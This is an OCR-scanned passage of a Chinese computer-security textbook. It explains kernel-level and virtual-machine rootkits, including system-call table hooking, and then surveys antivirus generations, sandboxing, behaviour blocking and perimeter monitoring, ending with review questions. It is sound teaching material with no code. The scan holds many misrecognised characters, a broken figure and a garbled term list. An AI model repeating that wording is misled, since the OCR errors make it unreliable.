作 在 用 户 模式 下 ， 通 过 修改 实用 程序 和 库 来 隐藏 自身 。 他 们 所 做 的 修改 可 以 被 内 核 中 的 代码 检 
测 到 ， 因 为 系统 内 核 运行 在 用 户 模式 的 底层 。 新 一 代 的 rootkit 使 用 了 更 加 隐蔽 的 技术 ， 我 们 


接 下 来 会 


6.9.3 


讨论 这 方面 的 内 容 
内 核 模 式 下 的 rootkit 


下 一 代 的 rootkit 向 底层 移动 ， 在 内 核 中 进行 修改 ， 与 操作 系统 代码 共存 ， 这 使 得 它们 更 
难 被 检测 到 。 任 何 反 病毒 程序 现在 都 受 rootkit 用 于 隐藏 自身 的 相同 “底层 ”修改 的 制约 。 但 
是 ， 有 方法 可 以 检测 这 些 变 化 。 

在 用 户 级 运行 的 程序 是 通过 系统 调用 来 与 内 核 交 互 的 。 因 此 ， 系 统 调用 是 内 核 级 rootkit 

现 隐藏 的 主要 目标 。 作 为 rootkit 如 何 操作 的 一 个 例子 ， 我们 来 看 一 下 Linux 系统 调用 的 实 
H. Æ Linx 中 ， 每 一 个 系统 调用 都 会 被 分 配 一 个 唯一 的 系统 调用 编号 。 当 一 个 用 户 模 式 的 进 
程 执行 系统 调用 时 ， 该 进程 是 通过 系统 调用 编号 来 引用 系统 调用 的 。 内 核 维护 着 一 张 系统 调用 
表 ， 每 一 项 对 应 着 一 个 系统 调用 ， 其 中 每 项 的 内 容 是 对 应 系统 调用 例 程 的 入 口 地 址 。 系 统 调用 
编号 就 是 这 个 调用 在 表 中 的 索引 。 


O ”内 核 是 操作 系统 的 一 部 分 ， 包 括 使 用 最 频繁 和 最 关键 的 软件 部 分 。 内 核 模式 是 为 内 核 保留 的 特权 执行 模式 : 


通常 ， 内 核 模式 允许 访问 在 非特 权 模 式 下 运行 的 进程 所 不 能 访问 的 主 存 区 域 ， 还 能 执行 仅 能 在 内 核 模 式 下 
执行 的 某 些 机 器 指令 。 


[LEVI06] 列 出 了 3 种 可 以 用 来 修改 系统 调用 的 技术 : 

o 修改 系统 调用 表 (modify the system call table): 黑客 修改 存储 在 系统 调用 表 中 的 选 定 的 
系统 调用 的 地 址 。 这 样 rootkit 就 把 系统 调用 从 原来 合法 的 例 程 指向 了 rootkit 所 指定 的 
程序 。 图 6-3 显示 了 knark rootkit 是 如 何 实现 的 。 

e 修改 系统 调用 表 的 目标 对 象 (modify system call table target): 黑客 用 恶意 代码 覆盖 了 所 
选 定 的 正常 系统 调用 例 程 ， 而 系统 调用 表 没 有 被 修改 。 

e 重 定向 系统 调用 表 (redirect the system call table): 黑客 把 对 整个 系统 调用 表 的 引用 重 定 
回 到 新 的 内 核 存 储 单元 中 的 一 个 新 表 上 。 








| | 
fork entry |e, 
fread entry |a 









sys_chdir() 
a) 正常 的 内 核 存 储 配置 b) knark 安 装 之 后 的 情形 
图 6-3 rootkit 对 系统 调用 表 的 修改 


6.9.4 虚拟 机 和 其 他 外 部 rootkit 


最 新 一 代 的 rootkit 使 用 的 代码 对 目标 操作 系统 完全 不 可 见 。 代 码 通常 实现 为 某 种 流 谍 式 
或 受到 破坏 的 虚拟 机 监视 右 或 虚拟 屋 ， 并 得 到 新 式 处 理 器 文 持 的 硬件 虚拟 化 辅助 。rootkit 代码 
完全 运行 在 目标 操作 系统 甚至 是 内 核 代码 的 视野 的 下 层 ， 因 为 操作 系统 并 不 知道 自己 正 运行 在 
虚拟 机 中 ， 并 可 能 受到 来 自 底层 代码 的 监视 和 攻击 [SKAP07]。 

几 种 虚拟 化 rootkit 的 原型 已 经 在 2006 年 被 公之于众 。 其 中 ，SubVirt 可 以 攻击 运行 在 微软 
的 Virtual PC 或 VMWare 的 Workstation 虚拟 层 下 的 Windows 系统 ， 方 式 是 修改 它们 使 用 的 引 
导 进 程 。 当 然 ， 这 些 修 改 也 使 得 这 一 rootkit 的 存在 有 可 能 被 检测 发 现 。 

但 是 ， 男 一 个 名 为 Blue Pill 的 rootkit 能 够 在 系统 下 层 安 装 一 个 很 “轻薄 ”的 虚拟 层 来 攻 
击 本 地 Windows Vista 系统 ， 然 后 继续 无 颖 地 在 虚拟 机 中 执行 该 系统 。 因 为 其 只 需 利 用 Vista 内 
核 执 行 一 个 流氓 驱动 rootkit 便 可 以 在 目标 系统 执行 时 安装 自身 ， 这 非常 难以 被 检测 。 对 运行 
在 支持 硬件 虚拟 化 的 新 型 处 理 器 上 但 并 没有 真正 使 用 虚拟 层 的 系统 而 言 ， 此 类 rootkit 特别 具 
有 威胁 性 。 

一 些 其 他 的 rootkit 变种 利用 Intel 处 理 需 用 于 控制 低级 硬件 的 系统 管理 模式 (System 
Management Mode, SMM) 号 ,或 者 用 于 首次 引导 的 BIOS 代码 。 此 类 代码 对 附属 硬件 设备 有 
直接 的 权限 ， 对 于 运行 在 这 些 特殊 模式 之 外 的 代码 一 般 不 可 见 [EMBL08]。 

为 了 应 对 这 些 类 型 的 rootkit， 必 须 确保 整个 引导 过 程 都 是 安全 的 ， 这 样 操作 系统 在 加 载 过 
程 中 就 不 会 安装 此 类 恶意 代码 。 这 需要 监视 所 有 的 虚拟 层 代 码 以 确保 其 是 合法 的 。 我 们 将 在 第 
12 章 进 一 步 讨论 这 方面 的 内 容 。 






日 ”系统 管理 模式 是 Intel 处 理 器 上 用 来 对 低级 硬件 进行 控制 的 相对 透明 的 模式 ， 其 有 自身 私有 的 存储 空间 和 执 
行 环境 ， 对 运行 在 外 部 的 代码 一 般 是 透明 的 例如， 运行 在 操作 系统 中 )。 
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6.10 ”对 拉手 段 


这 一 节 我 们 讨论 针对 恶意 软件 的 可 能 对 抗 手段 。 这 些 手段 通常 被 称 为 “ 反 病 毒 ” 机 制 ， 因 
为 它们 的 开发 最 初 是 专门 针对 计算 机 病毒 的 。 但 是 ， 如 今 它 们 已 经 进化 为 针对 我 们 在 本 章 讨 论 
的 大 部 分 种 类 恶意 软件 的 安全 措施 。 


6.10.1 针对 恶意 软件 的 对 抗 措施 


理想 的 应 对 恶意 软件 威胁 的 方法 是 预防 。 首 当 其 冲 的 是 阻止 恶意 软件 进入 计算 机 系统 ， 然 
后 是 阻止 其 修改 计算 机 系统 。 完 全 达到 这 一 目标 几乎 是 不 可 能 的 ， 当 然 , 采取 适当 的 措施 以 强 
化 系统 和 防止 恶意 软件 感染 系统 的 确 可 以 极 大 地 减少 其 攻击 的 成 功率 。NIST SP 800-83 提出 了 
恶意 软件 预防 措施 的 4 个 主要 元 素 : 规则 、 警 惕 性 、 弥 补 弦 点 和 缓解 威胁 。 有 一 个 针对 恶意 软 
件 的 正当 防御 策略 为 采取 适当 的 预防 措施 提供 了 基础 。 

一 个 最 基本 的 防御 措施 是 保证 操作 系统 的 版 本 尽 可 能 及 时 更 新 ， 打 上 全 部 的 补丁 ， 这 样 可 
以 减少 大 部 分 针对 系统 漏洞 的 攻击 。 接 下 来 则 是 为 系统 中 的 应 用 程序 和 数据 存储 设置 适当 的 访 
问 控制 ， 使 得 任何 用 户 都 能 够 访问 的 文件 尽 可 能 地 少 ， 从 而 减少 可 能 随 此 类 文件 的 执行 而 发 生 
的 恶意 软件 感染 和 系统 破坏 。 这 些 措施 直接 针对 蠕虫 、 病 毒 和 某 些 木马 使 用 的 关键 传播 机 制 。 
我 们 将 在 第 12 间 对 其 进行 更 深入 的 讨论 。 

防御 恶意 软件 的 第 三 种 传播 机 制 ， 即 利用 社会 工程 学 的 攻击 方法 ， 需 要 依赖 适当 的 用 户 安全 
意识 和 相关 培训 。 这 是 为 了 让 用 户 对 这 些 攻击 有 更 好 的 警惕 性 ， 避 免 他 们 做 出 会 导致 受到 攻击 
的 行为 。NIST SP 800-83 提供 了 有 关 适 当 的 安全 意识 的 实例 ， 我 们 将 在 第 17 章 再 回顾 这 一 话题 。 

如 果 预 防 措施 失败 了 ， 针 对 恶意 软件 威胁 还 存在 以 下 由 各 种 技术 性 手段 所 文 持 的 绥 解 
措施 : 

e 检测 (detection): 一 旦 被 感染 ， 就 马上 确定 恶意 软件 的 存在 并 对 其 定位 。 

e 识别 (identification): 一 旦 检测 到 恶意 软件 ， 立 即 识别 出 是 何 种 恶意 软件 感染 了 系统 。 

o 清除 (removal): 一 旦 识别 出 恶意 软件 类 型 ， 立 刻 清除 恶意 代码 在 被 感染 的 系统 中 的 所 

有 痕迹 ， 以 阻止 其 继续 扩散 。 

如 果 成 功 检测 到 恶意 软件 但 没有 成 功 识别 或 清除 ， 可 以 选择 删除 所 有 被 感染 文件 或 恶意 文 
件 ， 并 重新 加 载 上 述 文件 的 干净 的 备份 版 本 。 对 于 有 些 特别 项 固 的 感染 ， 可 能 需要 完全 清理 所 
有 的 存储 ， 然 后 利用 干净 的 媒介 重建 系统 。 在 某 些 特别 恶劣 的 感染 情况 下 ， 这 可 能 需要 一 个 完 
全 空白 的 存储 空间 ， 并 从 已 知 的 干净 介质 重建 感染 系统 。 

首先 ， 让 我 们 考虑 一 下 有 效 的 恶意 软件 对 抗 措 施 要 满足 哪些 要 求 : 

© 通用 性 (generality): 使 用 的 方法 应 该 能 对 付 绝 大 多 数 攻 击 。 

o 及 时 性 (timeliness): 使 用 的 方法 应 该 能 快速 做 出 啊 应 ， 以 限制 被 感染 程序 或 系统 数量 

和 随 之 而 来 的 行为 。 

o 弹性 (resiliency) : 使 用 的 方法 应 该 能 够 抵抗 攻击 者 为 了 向 避 反 恶 意 软 件 技术 而 使 用 的 
隐藏 技术 。 
最 小 拒绝 服务 代价 (minimal denial-of-service cost) : 反 病 毒 软件 的 应 用 要 尽量 减少 对 主 
机 性 能 和 服务 质量 的 影响 。 也 就 是 说 ， 在 防治 晋 意 软件 时 ， 不 能 显著 干扰 主机 的 正 背 


操作 。 
e 透明 性 (transparency) : 防治 软件 和 设备 不 能 要 求 修改 现 有 的 操作 系统 、 应 用 程序 和 
硬件 。 


e 全 局 与 局 部 覆盖 范围 (global and local coverage): 使 用 的 方法 应 该 能 够 同时 处 理 来 自 企 
业 网 外 部 和 内 部 的 攻击 源 。 
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不 过 ， 要 达到 所 有 这 些 要 求 则 通常 需要 多 种 手段 相 结 合 的 深度 防护 策略 ( defense-in-depth 
strategy ) . 

恶意 软件 的 检测 可 以 部 署 在 许多 不 同 的 位 置 。 它 可 能 是 运行 于 受 感染 系统 中 、 监 视 进 入 系 
统 的 数据 和 系统 中 程序 的 运行 和 行为 的 反 病 毒 程 序 ; 也 可 以 是 某 个 组 织 的 网 络 防火 墙 或 人 侵 检 
测 系 统 ( intrusion detection system, IDS) 所 维护 的 边界 安全 机 制 的 一 部 分 。 最 后 ， 检 测 也 可 以 
分 布 式 地 同时 从 主机 和 边界 传感器 收集 数据 (这 或 许 会 涵盖 大 量 的 网 络 和 组 织 ) 以 便 能 够 以 最 
大 的 视野 了 解 恶意 软件 的 活动 情况 。 下 面 我 们 详细 讨论 上 述 的 每 一 种 方式 。 


6.10.2 ”基于 主机 的 扫描 器 和 基于 签名 的 反 病 毒 软件 


反 病 毒 软件 的 首要 部 署 位 置 是 各 个 终端 系统 。 这 不 仅 给 予 了 反 病 毒 软 件 最 大 的 权限 来 收集 
恶意 软件 对 目标 系统 造成 的 影响 ， 还 能 将 恶意 软件 的 活动 限制 在 最 小 范围 。 个 人 电脑 如 今 已 经 
广泛 地 使 用 了 反 病 毒 软件 ， 这 在 某 种 程度 上 也 是 因为 恶意 软件 的 规模 和 活动 的 爆炸 式 增长 。 这 
类 软件 可 以 视 为 基于 主机 的 入 侵 检 测 系统 的 一 种 形式 ,我们 将 在 8.4 节 做 更 全 面 的 讨论 。 病 毒 
及 其 他 恶意 软件 同 其 相应 的 反 病 毒 技 术 ， 在 双方 不 断 对 抗 的 过 程 中 也 在 不 断 地 发 展 进 步 。 早 期 
的 恶意 软件 代码 相对 简单 ， 易 于 检测 ， 所 以 容易 被 相对 简单 的 反 病毒 软件 识别 和 清除 。 随 着 恶 
意 软 件 军备 竞赛 的 升级 ， 恶 意 软 件 代 码 和 反 病 毒 软件 都 在 变 得 更 复杂 ， 更 精妙 。 

[STEP93] 将 反 病 毒 软件 的 发 展 划分 为 四 代 : 

e 第 一 代 : 简单 的 扫描 器 。 

e 第 二 代 : 局 发 式 扫 描 需 。 

e 第 三 代 : 活动 陷阱 (activity trap). 

e 第 四 代 : 全 面 的 保护 。 

第 一 代 扫 描 需 需要 病毒 特征 码 来 识别 病毒 。 病 毒 也 许 会 含有 “通配符 "， 但 就 本 质 而 言 ， 
所 有 拷贝 都 具有 相同 的 结构 和 比特 模式 。 基 于 病毒 特征 码 的 扫描 仅仅 局 限于 检测 已 知 病毒 。 男 
一 种 第 一 代 扫 描 器 记录 系统 中 各 可 执行 文件 的 长 度 信息 ， 然 后 通过 检查 文件 长 度 变化 来 检测 
病毒 。 

第 二 代 扫 描 硕 不 再 依赖 于 病毒 特征 码 ， 而 是 通过 局 发 式 规则 来 检测 可 能 存在 的 病毒 感染 。 
其 中 有 一 类 扫描 器 是 通过 搜索 经 常 与 病毒 关联 的 代码 段 来 检测 病毒 。 例 如 ， 扫 描 器 可 能 会 搜索 
多 态 病 毒 使 用 的 加 密 循环 的 起 始 部 分 并 发 现 其 加 密 的 密 钥 。 一 旦 发 现 了 密 钥 ， 扫 描 占 就 能 解密 
病毒 ， 并 识别 病毒 类 型 ， 然 后 清除 病毒 并 使 被 感染 程序 重新 提供 服务 。 

第 二 代 扫 描 的 另 一 种 方法 是 完整 性 检测 。 每 个 程序 都 被 附加 一 个 校 验 和 。 如 果 病 毒 感染 了 
程序 但 没有 修改 程序 后 面 附加 的 校 验 和 ， 完 整 性 检测 就 能 发 现 病 毒 对 文件 的 修改 。 为 了 对 付 那 
些 在 感染 时 能 自动 修改 校 验 和 的 病毒 ， 需 要 使 用 带 加 密 功能 的 散 列 函数 。 加 密 的 密 钥 要 与 程序 
分 开 保存 ， 使 病毒 无 法 生成 新 的 散 列 码 并 对 其 进行 加 密 。 通 过 使 用 散 列 函数 而 不 是 简单 的 校 验 
和 ， 就 可 以 防止 病毒 与 以 前 一 样 通过 调整 程序 来 产生 相同 的 散 列 码 。 

第 三 代 反 病毒 程序 是 内 存 驻 留 程序 ， 它 通过 病毒 行为 来 识别 病毒 而 不 是 通过 被 感染 文件 的 
内 部 结构 特征 。 这 种 反 病 毒 程 序 的 优点 是 不 用 为 大 量 的 病毒 生成 特征 码 和 局 发 式 规则 。 它 只 需 
要 去 识别 一 小 部 分 预示 病毒 想 要 感染 的 行为 ， 然 后 阻止 这 些 行为 。 这 一 类 的 程序 使 用 动态 分 析 
技术 ， 我 们 将 在 下 一 节 举 例 讨 论 。 

第 四 代 产 品 是 综合 运用 各 种 反 病 毒 技 术 的 软件 包 。 它 包括 扫描 和 活动 陷阱 组 件 。 同 时 还 加 
入 了 访问 控制 功能 ， 从 而 限制 了 病毒 对 系统 渗透 的 能 力 ， 也 就 限制 了 病毒 修改 文件 以 继续 传播 
的 能 力 。 

病毒 和 反 病 毒 的 较量 还 在 继续 。 随 着 第 四 代 反 病毒 软件 的 出 现 ， 我 们 采用 了 更 加 全 面 的 


152 FFD HAMEARKAREL 


防御 策略 ， 从 而 将 防范 扩大 到 更 广泛 意义 上 的 计算 机 安全 领域 。 这 些 包括 更 加 复杂 的 反 病 毒 
Fix 

沙 箱 分 析 “一 种 检测 和 分 析 亚 意 代码 的 方式 是 在 沙 箱 或 虚拟 机 中 运行 恶意 代码 。 这 可 以 
保证 代码 在 可 控制 的 环境 内 运行 ， 其 行为 可 以 被 近 距 离 监 控 ， 同 时 不 会 对 实际 的 系统 安全 造成 
威胁 。 这 些 环境 包括 模拟 目标 系统 的 内 存 和 CPU 的 沙 箱 仿真 器 ， 以 及 复制 目标 系统 的 全 部 功 
能 但 可 以 很 容易 地 恢复 到 已 知 状态 的 完全 虚拟 机 。 我 们 将 在 12.8 节 中 具体 讨论 虚拟 环境 的 类 
型 。 在 这 种 环境 中 运行 潜在 的 恶意 软件 可 以 让 检测 系统 对 恶意 软件 复杂 加 密 、 多 态 或 变质 进行 
检测 。 代 码 必 须 将 自己 转型 为 所 需 的 机 器 指令 ， 而 后 ， 其 将 会 运行 以 执行 攻击 者 想 要 实现 的 恶 
意 行为 。 然 后 ， 系 统 可 以 对 所 得 到 的 解压 缩 、 转 换 或 解密 的 代码 进行 扫描 ， 并 与 已 知 的 恶意 软 
件 签名 比 对 ， 或 者 让 代码 继续 运行 并 监视 其 行为 ， 以 检测 可 能 的 恶意 活动 [EGEL12,KERA 16]. 
此 扩展 分 析 可 用 于 开发 新 的 未 知 恶意 软件 的 反 病 毒 签名 。 

沙 箱 分 析 设 计 最 困难 的 部 分 是 确定 执行 每 次 解释 (interpretation) 所 需 的 时 间 。 通 常 ， 恶 意 
软件 元 素 在 程序 开始 执行 后 不 和 久 便 被 激活 ， 但 最 近 的 恶意 软件 越 来 越 多 地 使 用 逃避 方法 ， 例 如 
扩展 休眠 以 逃避 沙 箱 系统 的 检测 [KERA16]。 扫 描 需 模拟 运行 特定 程序 的 时 间 越 长 ， 越 可 能 捕 
获 任何 隐藏 的 恶意 软件 。 然 而 ， 沙 箱 分 析 只 有 有 限 的 时 间 和 资源 可 用 ， 因 为 需要 分 析 大 量 潜在 
的 恶意 软件 。 

随 着 分 析 技 术 的 提高 ， 在 恶意 软件 作者 和 对 抗 者 之 间 展 开 了 一 场 军备 竞赛 。 一 些 恶 意 软件 
查看 其 是 否 运 行 在 沙 箱 或 虚拟 环境 中 ， 如 果 是 ， 则 会 隐藏 其 恶意 行为 。 其 他 恶意 软件 包括 在 参 
与 恶意 活动 之 前 的 延长 休 眼 期 ， 以 试图 在 分 析 终 止 之 前 规避 检测 。 恶 意 软 件 还 可 能 包含 一 个 逻 
辑 炸弹 ， 在 显示 恶意 行为 之 前 来 寻找 一 个 特定 的 日 期 、 特 定 的 系统 类 型 或 是 网 络 位 置 ， 而 沙 箱 
环境 不 能 与 之 匹配 。 作 为 回应 ， 分 析 者 调整 其 沙 箱 的 环境 来 试图 躲避 这 些 测 试 。 这 场 竞赛 仍 在 
继续 。 

基于 主机 的 动态 恶意 软件 分 析 “与 局 发 式 或 基于 特征 码 的 扫描 器 不 同 ， 动 态 恶意 软件 分 
析 或 行为 阻 断 软件 与 主机 的 操作 系统 相 结 合 ， 实 时 监控 恶意 的 程序 行为 [CONR02, NACH02]。 
这 是 一 类 基于 主机 的 入 侵 检 测 系 统 ， 我 们 将 在 9.6 节 进 行 深入 讨论 。 这 个 软件 监视 可 疑 恶意 代 
码 的 行为 ， 寻 找 潜在 的 恶意 行为 ， 类 似 于 我 们 在 前 面 讨 论 的 沙 箱 系统 。 行为 阻 断 软件 能 够 在 程 
序 的 恶意 行为 影响 计算 机 之 前 将 其 阻 断 。 被 监控 的 程序 行为 包括 : 

e 试图 打开 、 浏 览 、 删 除 或 修改 文件 。 

e 试图 格式 化 磁盘 以 及 其 他 不 可 恢复 的 磁盘 操作 。 

o 对 可 技 行 程序 或 宏 的 逻辑 机 制 进行 修改 。 

e 修改 系统 的 关键 设置 ， 例 如 启动 设置 。 

e 通过 电子 邮件 或 者 即时 通信 软件 发 送 可 执行 内 容 。 

e 初始 化 网 络 通信 。 

因为 动态 分 析 软 件 能 及 时 阻 断 可 疑 软件 的 执行 ， 这 比 起 现 有 的 反 病 毒 检测 技术 (如 特征 码 
技术 和 启发 式 技术 ) 具有 很 大 的 优势 。 因 为 即使 打 乱 再 重 排 病毒 或 者 蠕虫 的 指令 序列 的 方法 很 
多 ， 而 且 许 多 方法 都 可 以 有 效 地 躲避 特征 码 扫 描 器 或 启发 式 方法 的 检测 ， 但 是 最 终 ， 亚 意 代码 
必须 要 向 系统 发 送 特定 的 请 求 。 因 此 ， 行 为 阻 断 程序 通过 截获 所 有 这 样 的 请 求 ， 能 够 识别 并 阻 
止 恶意 行为 ， 而 不 管 病毒 或 者 蠕虫 如 何 使 其 代码 变 得 模糊 、 难 以 识别 。 

单纯 的 动态 分 析 是 有 局 限 性 的 。 因 为 在 恶意 程序 的 所 有 行为 被 识别 出 来 之 前 ， 该 程序 已 经 
在 目标 机 器 上 执行 了 ， 所 以 在 它 被 检测 并 阻止 之 前 就 可 能 已 经 对 系统 造成 了 损害 。 例 如 ， 一 个 
新 病毒 可 能 在 其 感染 某 个 文件 并 被 阻 断 之 前 ， 已 经 将 硬盘 上 的 一 些 看 起 来 不 重要 的 文件 转移 了 
位 置 。 即 使 病毒 的 实际 感染 行为 被 阻 断 了 ， 用 户 可 能 也 无 法 定位 他 的 文件 ， 这 会 导致 生产 效率 


的 降低 甚至 更 糟糕 的 情况 。 

间谍 软件 的 检测 和 移 除 ”虽然 普通 的 反 病 毒 产 品 包含 了 用 以 检测 间谍 软件 的 特征 码 ， 但 是 
该 类 恶意 软件 带 来 的 威胁 和 其 使 用 的 隐藏 技术 ， 意 味 着 一 系列 的 专门 性 间谍 软件 检测 和 清除 工 
具 仍 然 有 存在 的 必要 。 这 些 工具 可 以 专业 地 检测 和 清除 恶意 软件 ， 并 可 以 提供 更 稳定 的 安全 性 
能 。 因 此 ， 它 们 可 以 作为 通用 的 反 病 毒 产品 的 有 益 补 充 (并 应 该 与 之 共同 使 用 )。 

rootkit 对 策 rootkit 的 检测 和 清除 是 非常 困难 的 ， 特 别 是 内 核 级 的 rootkit, rootkit 能 够 精 
确 地 损坏 那些 能 够 检测 rootkit 并 发 现 其 踪迹 的 管理 工具 ,使 自己 不 被 检测 到 。 

防范 rootkit 需要 多 种 网 络 级 和 计算 机 级 的 安全 工具 。 基 于 网 络 和 基于 主机 的 入 侵 检 测 系 
统 都 能 够 用 来 检测 输入 通信 量 中 已 知 的 rootkit 攻击 的 代码 特征 。 基 于 主机 的 反 病 毒 软件 也 能 
被 用 来 识别 那些 已 知 rootkit 的 特征 。 

当然 ， 新 的 rootkit 或 者 已 有 rootkit 的 表现 出 新 特征 码 的 修改 版 本 会 不 断 出 现 。 对 于 这 种 
情况 ， 系 统 需要 搜索 那些 能 够 预示 rootkit 存在 的 行为 ， 例 如 截获 系统 调用 或 者 与 键盘 驱动 程 
序 交 互 的 键盘 记录 需 等 。 这 些 行 为 还 远 远 不 能 达到 检测 的 目的 。 例 如 ， 反 病毒 软件 通常 也 会 通 
过 截获 系统 调用 来 检测 。 

另 一 种 解决 方法 是 对 某 类 文件 做 完整 性 校 验 。RootkitRevealer 就 是 这 样 的 一 个 例子 ， 它 是 
SysInternals 公司 发 布 的 免费 软件 。 这 个 工具 将 使 用 API 的 系统 扫描 结果 与 不 使 用 API 的 指令 
所 获得 的 实际 存储 视图 进行 对 比 。 因 为 rootkit 通过 修改 系统 管理 员 调用 所 能 看 到 的 存储 视图 
He te AL. M RootkitRevealer 正 是 利用 了 这 个 差异 。 

如 果 检 测 到 一 个 内 核 级 的 rootkit， 那 么 无 论 如 何 ， 唯 一 安全 可 靠 的 解决 办 法 就 是 彻底 重 装 
被 感染 机 怖 的 操作 系统 。 


6.10.3 ”边界 扫描 处 理 


反 病 毒 软件 部 署 的 第 二 个 位 置 是 防火 墙 或 入 侵 检 测 系 统 (IDS)。 它 们 通常 包含 在 运行 于 
这 些 系 统 上 的 电子 邮件 和 Web 代理 服务 中 ,但 也 可 能 包含 在 人 和 侵 检测 系统 的 流量 分 析 组 件 中 。 
如 此 反 病 毒 软件 便 可 以 访问 通过 网 络 连 接 向 组 织 内 部 的 任何 系统 传播 的 恶意 软件 ， 从 而 以 更 大 
的 视野 观察 恶意 软件 的 活动 。 反 病毒 软件 也 可 能 包含 有 预防 人 侵 的 措施 ， 有 能 力 屏 菩 任 何 可 疑 
的 网 络 流量 ， 因 此 可 以 防止 恶意 软件 进入 和 损害 目标 系统 ， 无 论 威胁 来 自 内 部 还 是 外 部 。 

但 是 ， 这 些 方法 存在 局 限 性 ， 只 能 扫描 恶意 软件 内 容 ， 并 不 能 对 运行 在 被 感染 系统 中 的 恶 
意 软 件 所 表现 的 行为 进行 遏制 。 监 控 软 件 有 两 种 类 型 : 

© 入 口 监控 软件 (ingress monitor): 这 类 软件 被 安装 在 企业 内 部 网 络 和 Internet 之 间 。 
它们 可 以 是 一 个 边界 路 由 器 或 者 外 部 防火 墙 或 者 独立 的 被 动 监控 器 的 人 口 过 滤 软 件 
的 一 部 分 。 这 些 监视 器 能 够 使 用 异常 特征 或 局 发 式 的 方式 来 检测 恶意 软件 的 流量 ， 
我 们 将 在 第 8 章 深 入 讨论 这 个 问题 。 一 个 蜜 铅 也 可 以 捕获 到 输入 的 恶意 软件 流量 。 
入 口 监控 的 检测 技术 的 一 个 例子 是 监测 那些 针对 未 被 使 用 的 本 地 IP 地 址 的 输入 通 
信 流 量 。 
出 口 监控 软件 〈egress monitor): 这 些 软件 可 以 被 安装 在 企业 内 部 网 络 中 的 各 个 独立 局 
域 网 的 出 口 点 上 ， 也 可 以 被 安装 在 企业 内 部 网 与 Internet 之 间 。 对 于 前 一 种 情况 ， 出 
口 监 控 软 件 可 以 是 局 域 网 路 由 响 或 交换 机 的 出 口 过 滤 软 件 的 一 部 分 。 和 和 人 入口 监控 一 样 ， 
外 部 防火 墙 和 蜜 缸 也 可 以 包含 出 口 监控 软件 。 事 实 上 ， 这 两 类 监控 软件 可 以 被 安装 在 一 
起 。 出 口 监控 就 是 用 来 通过 监控 输出 通信 中 是 否 存在 扫描 或 者 其 他 可 疑 行为 来 捕获 恶意 
软件 攻击 的 源头 。 这 些 监控 方法 可 以 寻找 蠕虫 的 顺序 或 随机 扫描 行为 ， 限 制 网 络 速率 或 
阻止 网 络 流 量 。 也 能 够 检测 和 应 对 非 正 常 的 大 量 电 子 邮 件 流量 ， 如 海量 邮件 蠕虫 (mass- 
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mail worm) 或 垃圾 电子 邮件 载荷 所 造成 的 流量 。 也 能 够 防止 数据 外 泄 “ 数 据 丢 失 “， 监 
控 敏 感 信息 流 非 授 权 传输 到 组 织 之 外 。 
边界 监控 也 能 够 通过 检测 非 正 党 网络 流量 模式 以 协助 检测 相应 的 僵尸 网 络 活 动 。 当 僵尸 机 
们 被 激活 并 进行 攻击 时 ， 这 些 防范 措施 能 够 检测 到 这 个 攻击 。 但 是 ， 这 些 措施 的 主要 目标 应 该 
是 在 僵尸 网 络 的 组 建 阶段 就 检测 到 并 予以 阻止 ,具体 手段 则 是 利用 我 们 之 前 讨论 过 的 多 种 扫 摘 
技术 ,识别 和 阻止 恶意 软件 对 与 恶意 软件 有 关 的 载 伍 的 传播 。 


6.10.4 ”分 布 式 情报 收集 处 理 


使 用 反 病 毒 软件 的 最 后 一 种 方式 是 对 其 进行 分 布 式 配 置 。 它 从 大 量 的 主机 或 边界 传 感 融 
中 收集 数据 ， 把 这 些 信息 发 送 至 一 个 能 够 将 数据 进行 联系 和 分 析 的 中 央 分 析 系 统 。 该 系统 随后 
即 可 对 恶意 软件 的 特征 和 行为 模式 做 出 更 新 ， 并 返回 给 所 有 受 其 协调 的 系统 以 共同 应 对 和 防御 
恶意 软件 的 攻击 。 人 们 设计 了 许多 这 样 的 系统 ， 它 们 实际 上 是 分 布 式 人 侵 防 御 系 统 (Intrusion 
Prevention System, IPS) 的 一 种 特殊 的 范例 ， 我 们 将 在 9.6 节 对 其 加 以 深入 讨论 。 


6.11 关键 术语 、 复 习题 和 习题 


关键 术语 

advanced persistent threat ( 高 级 持续 性 威胁 ) parasitic virus (寄生 病毒 ) 

adware (广告 软件 ) payload (有 效 载 衔 ) 

backdoor (后 门 ) phishing (网 络 钓鱼 ) 

blended attack (混合 攻击 ) polymorphic virus (多 态 病 毒 ) 
boot-sector infector (引导 扇 区 病毒 ) propagate (传播 ) 

botnet (僵尸 网 络 ) ransomware (勒索 软件 ) 
crimeware (犯罪 软件 ) scanning (扫描 ) 

data exfiltration (数据 免疫 系统 ) spear-phishing ( 鱼 又 式 网 络 钓鱼 ) 
downloader ( FRAR) spyware (间谍 软件 ) 
drive-by-download (路 过 式 下 载 ) stealth virus (隐蔽 型 病毒 ) 

e-mail virus (电子 邮件 病毒 ) trapdoor (Kil ]) 

infection vector (感染 问 量 ) Trojan horse(〈 特 洛 伊 木 马 ) 
keyloggers (键盘 记录 天) virus (病毒 ) 

logic bomb (化 辑 炸弹 ) watering-hole attack (水 洞 式 攻击 ) 
macro virus( 宏 病毒 ) worm (蠕虫 ) 

malicious software (恶意 软件 ) zombie (僵尸 机 ) 

metamorphic virus (变形 病毒 ) zero-day exploit ( 0-day 攻击 ) 
mobile code (移动 代码 ) 

复习 题 


6.1 恶意 软件 的 三 种 传播 机 制 是 什么 ? 

6.2 ”恶意 软件 所 携带 的 四 大 类 有 效 载荷 是 什么 ? 
6.3 ”高 级 持续 性 威胁 有 什么 特征 ? 

6.4 ”病毒 或 蠕虫 执行 过 程 中 的 典型 阶段 是 什么 ? 
6.5 ”病毒 利用 什么 机 制 隐 藏 自身 ? 

6.6 机 唤 可 执行 病毒 和 宏 病 毒 有 何 区 别 ? 


6.7 

6.8 

6.9 

6.10 
6.11 
6.12 
6.13 
6.14 
6.15 
6.16 


BOF BEKH 155 


蠕虫 利用 什么 方法 获得 远程 系统 的 权限 进行 传播 ? 

什么 是 路 过 式 下 载 ? 它 如 何 传 播 蠕虫 ? 

木马 如 何 传 播 恶意 软件 ?计算 机 系统 中 的 木马 有 何 共同 点 ? 移动 平台 中 呢 ? 

什么 是 逻辑 炸弹 ? 

后 门 、bot、 键 盘 记 录 器 、 间 谍 软 件 和 rootkit 之 间 有 何 差别 ?它们 能 和 否 在 同一 个 恶意 软件 内 呈现 ? 
网 络 钓鱼 攻击 和 鱼 又 式 网 络 钓鱼 有 什么 区 别 ， 特 别 是 在 目标 上 ? 

列举 rootkit 在 系统 中 使 用 的 不 同 层面 。 

说 明 一 些 恶 意 软件 对 抗 措施 的 要 点 。 

